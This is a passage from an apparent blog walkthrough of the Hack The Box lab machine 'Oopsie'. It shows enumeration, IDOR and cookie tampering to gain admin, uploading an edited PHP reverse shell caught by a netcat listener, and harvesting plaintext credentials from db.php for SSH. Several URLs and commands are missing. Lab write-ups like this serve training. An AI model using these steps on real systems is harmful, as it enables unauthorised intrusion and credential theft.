top of page



As usual let's start with nmap

nmap -sV -sC

Port 80 is open so let's check the website.

Open your browser and type in the url bar:

As usual let's start with gobuster. Locate the wordlist we are going to use first.

locate big.txt

Let's use the wordlist :


gobuster dir -u -w /opt/useful/SecLists/Discovery/Web-Content/big.txt

Let's use BurpSuite. Open Burpsuite and click on the Proxy tab

Turn off intercept

Click on Open Browser

In the url bar, type

Go back to Burp and click on the Target tab

We found something interested, a directory called /cdn-cgi/login

This directory was not picked up by our gobuster earlier.

Let's open our browser from our VM and in the url bar, type:

We do not know any credentials but there is a link "Login as Guest"

Click on "Login as Guest"

We are logged in!

Let's click on Account

We are logged in as user guest, access ID 2233

Look at the url bar:

What if we were to change &id=2 into &id=1

Let's try, change the url at the end and press enter

Now we can see there is another user called admin with access ID 34322

We were not meant to see that, but it is a vulnerability of the target machine.

So we just learned that the user guest has a access ID of 2233 and the user admin has a access ID of 34322

Now let's click on the Uploads tab on the website:

This action require super admin rights. So if we had super admin rights, we would be able to upload files to the target machine. Interesting!

Right click on this web page and click on Inspect (Q)

Now Click on the Storage tab, we can see the following cookie:

At the moment we are logged in as the user guest with access ID 2233

What if we could change the cookie so that we are now user admin with access ID 34322

Let's try! Replace guest by admin and replace 2233 by 34322

Now refresh the uploads page and we now get the following:

We are now admin and we can now upload files!


Now let's try to upload a file.

Let's first locate the php reverse shell file and edit it

Open a new command prompt from your VM and type:

locate webshells/php

cd /usr/share/webshells/php  



We are interested in php-reverse-shell.php

Let's make a copy of this file into our home directory by typing:

cp php-reverse-shell.php /home/htb-sneakymouse/oopsie.php 
My username is htb-sneakymouse on my VM, this is why I used /htb_sneakymouse Replace this by your own username.

Now open a brand new command prompt and type:


I can see oopsie.php has been successfully copied to my home directory.

Let's now edit oopsie.php using:

sudo nano oopsie.php

Scroll down until you see $ip and $port

we need to change both ip and port

- replace by the IP of your VM. If you don't know your IP, open a new command prompt window and type ifconfig tun0

- replace 1234 by 4444 (we will listen on port 4444 when we set up our netcat later)

Press Ctrl + X to exit

Press Y (to save)

Press enter

Now let's upload this file on the target machine. Let's go back to the upload tab on the website:

We can now click on Browse

We select our file oopsie.php and click on Open

Now click on Upload

Looks like our file oopsie.php has been uploaded successfully. However we still don't know where it has been uploaded.

Remember earlier when we did the gobuster command, it found a directory called /uploads

Perhaps this is where the file has been uploaded!

First let's set up our netcat listener on port 4444. From your VM, open a new command prompt window and type:

nc -lnvp 4444

Now let's try to locate and run oopsie.php we just uploaded to our target machine. In the url search bar, type:

Nothing should happen but if you go back to your netcat (nc) command prompt, you should now have a shell:



Let's upgrade our shell using:

python3 -c 'import pty;pty.spawn("/bin/bash")'


cd home 

cd robert

cat user.txt


Congratulations! you got the user flag!

Lateral Movement

sudo -l

Unfortunately, we don't have the password

Let's explore the files on the target machine. Let's start with var/www/html

cd /var/www/html


cd cdn-cgi

cd login

cat db.php

Looks like we found some credentials

username: robert

password: M3g4C0rpUs3r!

This shell is not super stable but now we have some credentials!

We know from the nmap at the beginning that port 22 which is associated with ssh is open on the target machine. Let's try to ssh using roberts' credentials

ssh robert@

The password is


We are in!


Privilege Escalation

locate bugtracker

cd /usr/bin


type 1 for instance


this time, type hello for instance

Interesting this time we get /root/reports/hello: No such file or directory


this time type:


Congratulations! you found the root flag!


7,345 views0 comments

Recent Posts

See All


Rated 0 out of 5 stars.
No ratings yet

Add a rating
bottom of page